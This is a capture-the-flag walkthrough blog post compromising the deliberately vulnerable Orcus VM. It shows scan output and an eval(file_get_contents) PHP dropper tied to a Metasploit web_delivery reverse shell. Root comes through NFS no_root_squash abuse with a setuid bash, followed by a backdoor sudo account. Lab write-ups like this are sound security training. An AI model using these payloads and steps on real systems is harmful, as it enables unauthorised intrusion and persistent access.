
Hello guys, it’s my third Vulnerable VM by @ViperBlackSkull if you need more information you can reach me on twitter at @marghost. You can get the virtual machine HERE. So lets get started.
This vm is tagged as hard and it is! First i did a nmap
root@kali:~# nmap -T4 -A -v 192.168.1.21 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT Discovered open port 443/tcp on 192.168.1.21 Discovered open port 143/tcp on 192.168.1.21 Discovered open port 139/tcp on 192.168.1.21 Discovered open port 995/tcp on 192.168.1.21 Discovered open port 22/tcp on 192.168.1.21 Discovered open port 993/tcp on 192.168.1.21 Discovered open port 445/tcp on 192.168.1.21 Discovered open port 80/tcp on 192.168.1.21 Discovered open port 111/tcp on 192.168.1.21 Discovered open port 53/tcp on 192.168.1.21 Discovered open port 110/tcp on 192.168.1.21 Discovered open port 2049/tcp on 192.168.1.21 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA) |_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA) 53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST | http-robots.txt: 30 disallowed entries (15 shown) | /exponent.js.php /exponent.js2.php /exponent.php | /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php | /exponent_version.php /getswversion.php /login.php /overrides.php | /popup.php /selector.php /site_rss.php /source_selector.php |_/thumb.php |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 40370/tcp mountd | 100005 1,2,3 54899/udp mountd | 100021 1,3,4 32978/tcp nlockmgr | 100021 1,3,4 55763/udp nlockmgr | 100227 2,3 2049/tcp nfs_acl |_ 100227 2,3 2049/udp nfs_acl 443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA) |_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 2049/tcp open nfs_acl 2-3 (RPC #100227) MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ok so summary we have a webserver a rpc server with nfs and maybe accessible directory. We have two ssh server, this is odd. We have a samba server.
So next step is to nikto this server and see what is going on.
root@kali:~# nikto -h 192.168.1.21 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.21 + Target Hostname: 192.168.1.21 + Target Port: 80 + Start Time: 2017-03-22 16:44:11 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500) + Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) + Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) + Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302) + Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200) + OSVDB-3268: /files/: Directory indexing found. + Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + OSVDB-3268: /tmp/: Directory indexing found. + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 30 entries which should be manually viewed. + Multiple index files found: /index.php, /index.html + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server. + OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. + /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php) + OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. + OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval. + OSVDB-3092: /admin/: This might be interesting... + OSVDB-3092: /files/: This might be interesting... + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3092: /tmp/: This might be interesting... + OSVDB-3092: : This might be interesting... possibly a system shell found. + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /test.php: This might be interesting... + /phpmyadmin/: phpMyAdmin directory found + 9338 requests: 0 error(s) and 48 item(s) reported on remote host + End Time: 2017-03-22 16:44:26 (GMT-4) (15 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Soooo we have a some portal and phpmyadmin installed. We will see the robot and the readme/changelog/license of the server.
The robots.txt do not help. The readme/license file say to us that we have an install of Exponent CMS and from the changelog we learn that we have the version 2.3.9.
A quick exploit search say that it il vuln from sql injection, but as i go to the index.php i try some and it is not working, i also see that the portal disclame the db is offline so it is a dead end.
The phpmyadmin default login do not work. I searched the other directories that nikto revealed and noting interesting to be found.
So as the creator of the VM invite us to do extended enumeration i will try some other information gathering tools.
So for enumeration sake i will use enum4linux tool to see what i can get
root@kali:~# enum4linux -a -o -n -v 192.168.1.21 Target ........... 192.168.1.21 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 192.168.1.21 | ==================================================== [V] Attempting to get domain name with command: nmblookup -A '192.168.1.21' [+] Got domain/workgroup name: WORKGROUP ============================================ | Nbtstat Information for 192.168.1.21 | ============================================ Looking up status of 192.168.1.21 ORCUS <00> - B <ACTIVE> Workstation Service ORCUS <03> - B <ACTIVE> Messenger Service ORCUS <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================== | Session Check on 192.168.1.21 | ===================================== [V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'help' 2>&1 [+] Server 192.168.1.21 allows sessions using username '', password '' =========================================== | Getting domain SID for 192.168.1.21 | =========================================== [V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 192.168.1.21 -c 'lsaquery' 2>&1 Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ====================================== | OS information on 192.168.1.21 | ====================================== [V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'q' 2>&1 [+] Got OS info for 192.168.1.21 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] [V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '192.168.1.21' 2>&1 [+] Got OS info for 192.168.1.21 from srvinfo: ORCUS Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 ============================= | Users on 192.168.1.21 | ============================= [V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '192.168.1.21' 2>&1 index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc: index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc: [V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '192.168.1.21' 2>&1 user:[viper] rid:[0x3e8] user:[root] rid:[0x3e9] ========================================= | Share Enumeration on 192.168.1.21 | ========================================= [V] Attempting to get share list using authentication WARNING: The "syslog" option is deprecated Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Orcus server (Samba, Ubuntu)) Server Comment --------- ------- ORCUS Orcus server (Samba, Ubuntu) Workgroup Master --------- ------- WORKGROUP ORCUS [+] Attempting to map shares on 192.168.1.21 [V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'print$' -U''%'' -c dir 2>&1 //192.168.1.21/print$ Mapping: DENIED, Listing: N/A [V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'IPC$' -U''%'' -c dir 2>&1 //192.168.1.21/IPC$ Mapping: OK Listing: DENIED ==================================================== | Password Policy Information for 192.168.1.21 | ==================================================== [V] Attempting to get Password Policy info with command: polenum '':''@'192.168.1.21' 2>&1 [E] Unexpected error from polenum: Traceback (most recent call last): File "/usr/bin/polenum", line 33, in <module> from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr ImportError: cannot import name dcerpc_v4[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "getdompwinfo" 2>&1 [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ============================== | Groups on 192.168.1.21 | ============================== [V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups builtin' 2>&1 [+] Getting builtin groups: [+] Getting builtin group memberships: [V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups domain' 2>&1 [+] Getting local groups: [+] Getting local group memberships: [V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "enumdomgroups" 2>&1 [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================= | Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames administrator' 2>&1 [V] Assuming that user "administrator" exists [V] User "administrator" doesn't exist. User enumeration should be possible, but SID needed... [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames guest' 2>&1 [V] Assuming that user "guest" exists [V] User "guest" doesn't exist. User enumeration should be possible, but SID needed... [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames krbtgt' 2>&1 [V] Assuming that user "krbtgt" exists [V] User "krbtgt" doesn't exist. User enumeration should be possible, but SID needed... [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames domain admins' 2>&1 [V] Assuming that user "domain admins" exists [V] User "domain admins" doesn't exist. User enumeration should be possible, but SID needed... [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames root' 2>&1 [V] Assuming that user "root" exists [I] Found new SID: S-1-5-21-2160833340-863236869-394548843 [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames bin' 2>&1 [V] Assuming that user "bin" exists [I] Found new SID: S-1-22-1 [V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames none' 2>&1 [V] Assuming that user "none" exists [V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c lsaenumsid 2>&1 [V] Processing SID S-1-5-32-550 [I] Found new SID: S-1-5-32 [V] Processing SID S-1-5-32-548 [V] Processing SID S-1-5-32-551 [V] Processing SID S-1-5-32-549 [V] Processing SID S-1-5-32-544 [V] Processing SID S-1-1-0 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1001 Unix User\kippo (Local User) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username '', password '' S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User) S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group) S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User) S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)
So we find basic access to samba and rpc and with those we find the users viper root. We found user kippo when enumerating user SID. Looking like a manga name, I will maybe investigate on this.
Dirb with the big dictionary is my next step.
root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Mar 22 17:16:24 2017 URL_BASE: http://192.168.1.21/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://192.168.1.21/ ---- ==> DIRECTORY: http://192.168.1.21/FCKeditor/ + http://192.168.1.21/LICENSE (CODE:200|SIZE:15437) ==> DIRECTORY: http://192.168.1.21/admin/ ==> DIRECTORY: http://192.168.1.21/backups/ ==> DIRECTORY: http://192.168.1.21/cron/ ==> DIRECTORY: http://192.168.1.21/external/ ==> DIRECTORY: http://192.168.1.21/files/ ==> DIRECTORY: http://192.168.1.21/framework/ ==> DIRECTORY: http://192.168.1.21/install/ ==> DIRECTORY: http://192.168.1.21/javascript/ ==> DIRECTORY: http://192.168.1.21/phpmyadmin/ + http://192.168.1.21/robots.txt (CODE:200|SIZE:1347) + http://192.168.1.21/server-status (CODE:403|SIZE:300) + http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113) ==> DIRECTORY: http://192.168.1.21/themes/ ==> DIRECTORY: http://192.168.1.21/tmp/ + http://192.168.1.21/webalizer (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.1.21/zenphoto/ ---- Entering directory: http://192.168.1.21/FCKeditor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.21/install/ ---- ==> DIRECTORY: http://192.168.1.21/install/changes/ ==> DIRECTORY: http://192.168.1.21/install/files/ ==> DIRECTORY: http://192.168.1.21/install/images/ ==> DIRECTORY: http://192.168.1.21/install/include/ ==> DIRECTORY: http://192.168.1.21/install/pages/ ==> DIRECTORY: http://192.168.1.21/install/popups/ ==> DIRECTORY: http://192.168.1.21/install/samples/ ==> DIRECTORY: http://192.168.1.21/install/upgrades/ ---- Entering directory: http://192.168.1.21/javascript/ ---- ==> DIRECTORY: http://192.168.1.21/javascript/jquery/ ---- Entering directory: http://192.168.1.21/phpmyadmin/ ---- ---- Entering directory: http://192.168.1.21/zenphoto/ ---- + http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205) ==> DIRECTORY: http://192.168.1.21/zenphoto/albums/ ==> DIRECTORY: http://192.168.1.21/zenphoto/cache/ ==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/ ==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/ + http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471) ==> DIRECTORY: http://192.168.1.21/zenphoto/themes/ ==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/ ---- Entering directory: http://192.168.1.21/zenphoto/zp-core/ ---- + http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187) ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/ + http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546) ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/ ==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/ DOWNLOADED: 1575266 - FOUND: 13
I cleaned it a little and some interesting things where found. the zenphoto directory is an app that let user upload images, interesting for a web_delivery attack. There is a backups directory that nikto didint found the first time. some interesting things are there. SSH credentials that i cant download for now and a zipped file. Lets go and download it. There is a db_conn.php file that contained :
DEFINE ('DB_USER', 'dbuser'); DEFINE ('DB_PASSWORD', 'dbpassword'); DEFINE ('DB_HOST', 'localhost'); DEFINE ('DB_NAME', 'quizdb');
So next I will try to login into zenphoto. Ok into zenphoto i did the setup and everyting worked out fine, i could upload a php web_delivery and accessed it via the /zenphoto/albums/ directory.
This is how i made the web_delivery exploit with metasploit :
use exploit/multi/script/web_delivery set target 1 set lhost 192.168.1.14 set payload php/meterpreter/reverse_tcp set uripath v9HL33yWdUR4KFo run
Created a webdelivery.php file and filled it like this :
<?php eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo')); ?>
After I zipped it and uploaded it with zenphoto. It worked like a charm and when i went to the /zenphoto/albums/ i found my webdelivery.php file. Just opened it and. Then you will be prompted by metasploit to open a session, just log into put the shell command and load bash.
sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'
Now i have a terminal access 😀
And BAM the first flag!
[*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400 sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 5753 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www www-data@Orcus:/var/www$ ls 9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz flag.txt html zenphoto-zenphoto-1.4.10 www-data@Orcus:/var/www$ cat flag.txt cat flag.txt 868c889965b7ada547fae81f922e45c4
So next i did a linuxprivchecker to search for an escalation exploit.
wget http://www.securitysift.com/download/linuxprivchecker.py chmod +x linuxprivatechecker.py python ./linuxprivchecker.py
I found that the mysql server was vuln, BUT secure_file_priv is activated so no chance to exploit raptor_udf2
with dbuser.
git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git
Noting to be found here either
git clone https://github.com/rebootuser/LinEnum.git cd LinEnum ./LinEnum.sh
First thing i saw is the .youwillfindnothinghere and i was thinking MEH maybe but nooo
cd /home/.youwillfindnothinghere www-data@Orcus:/home/.youwillfindnothinghere$ ls ls itoldyou www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou cat itoldyou
PFFFF
But LinEnum found something usefull :
NFS config details: -rw-r--r-- 1 root root 415 Oct 18 19:56 /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /tmp *(rw,no_root_squash)
OH yea no_root_squash. That mean if me as a root upload a file to the server il will not be downgraded as nobody it will stay ‘root’. This can be used to escalate priv.!!
First on kali you need to install nfs-common (wtf kali)
showmount -e 192.168.1.21 Export list for 192.168.1.21: /tmp *
As expected
mount -t nfs 192.168.1.22:/tmp /tmpvictim -o nolock
Into the VM
cp /bin/bash /tmp/bash
From kali
cp /tmpvictim/bash /tmpvictim/vulnbash chmod 4777 vulnbash
Back to the vm just execute
vulnbash -p
Yesser miller we got root but to make it more stable i will create an user and log into ssh
openssl passwd -crypt test SSybfm7a0XqFo useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot usermod -aG sudo groot
root@kali:/tmpvictim# ssh groot@192.168.1.22 groot@Orcus:/$ id uid=1007(groot) gid=0(root) groups=0(root),27(sudo) groot@Orcus:/$ sudo su sudo: unable to resolve host Orcus root@Orcus:/# id uid=0(root) gid=0(root) groups=0(root)
Second flag
root@Orcus:~# cat flag.txt 807307b49314f822985d0410de7d8bfe
I found that what it is making this VM unique. After some search for the user kippo i found earlier, it is the user used by the kippo honeypot. Both last machine didint have an honeypot! So i am going to investigate to find a flag there.
third flag, i found that poking around :
root@Orcus:/etc/kippo# cd data root@Orcus:/etc/kippo/data# ls userdb.txt root@Orcus:/etc/kippo/data# cat userdb.txt root:0:123456 fakuser:1:TH!SP4SSW0RDIS4Fl4G!
AND its done!
M.